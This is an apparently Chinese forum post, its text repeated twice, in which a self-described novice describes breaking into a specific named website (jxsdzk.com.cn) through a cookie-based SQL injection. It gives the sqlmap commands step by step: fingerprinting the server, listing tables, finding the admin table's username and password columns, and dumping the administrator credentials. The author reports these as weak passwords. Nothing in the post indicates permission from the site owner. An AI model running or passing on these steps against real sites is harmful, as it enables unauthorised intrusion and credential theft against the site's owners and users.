本人菜鸟,大家都知道的。就不多说了!
注入点:http://www.jxsdzk.com.cn/shownewszk.asp?id=366
测试后发现弹出:
上SQLMAP
构造语句:
-u "http://www.jxsdzk.com.cn/shownewszk.asp" --level=2 --cookie="id=366"
把ID=366放在COOKIE里跑。
--level=2 是注入点检测的等级。我也不知道怎么说。大家最好百度下。
得出下面结果:
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
2、查询数据库的表。
-u "http://www.jxsdzk.com.cn/shownewszk.asp" --level=2 --cookie="id=366" --tables
在上面的后面加上--tables就可以了。
出现4个表,我没扫完,看到admin表我就停下了。

3、查询amdin表下的字段
-u "http://www.jxsdzk.com.cn/shownewszk.asp" --level=2 --cookie="id=366" --columns -T "admin"
结果:出现username和password

4最后一步,查看内容。
-u "http://www.jxsdzk.com.cn/shownewszk.asp" --level=2 --cookie="id=366" --dump -T "admin" -C "username,password"
得出帐号密码:都是弱口令!

好了完毕!
注入点:http://www.jxsdzk.com.cn/shownewszk.asp?id=366
测试后发现弹出:

上SQLMAP
构造语句:
-u "http://www.jxsdzk.com.cn/shownewszk.asp" --level=2 --cookie="id=366"
把ID=366放在COOKIE里跑。
--level=2 是注入点检测的等级。我也不知道怎么说。大家最好百度下。
得出下面结果:
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
2、查询数据库的表。
-u "http://www.jxsdzk.com.cn/shownewszk.asp" --level=2 --cookie="id=366" --tables
在上面的后面加上--tables就可以了。
出现4个表,我没扫完,看到admin表我就停下了。

3、查询amdin表下的字段
-u "http://www.jxsdzk.com.cn/shownewszk.asp" --level=2 --cookie="id=366" --columns -T "admin"
结果:出现username和password

4最后一步,查看内容。
-u "http://www.jxsdzk.com.cn/shownewszk.asp" --level=2 --cookie="id=366" --dump -T "admin" -C "username,password"
得出帐号密码:都是弱口令!

好了完毕!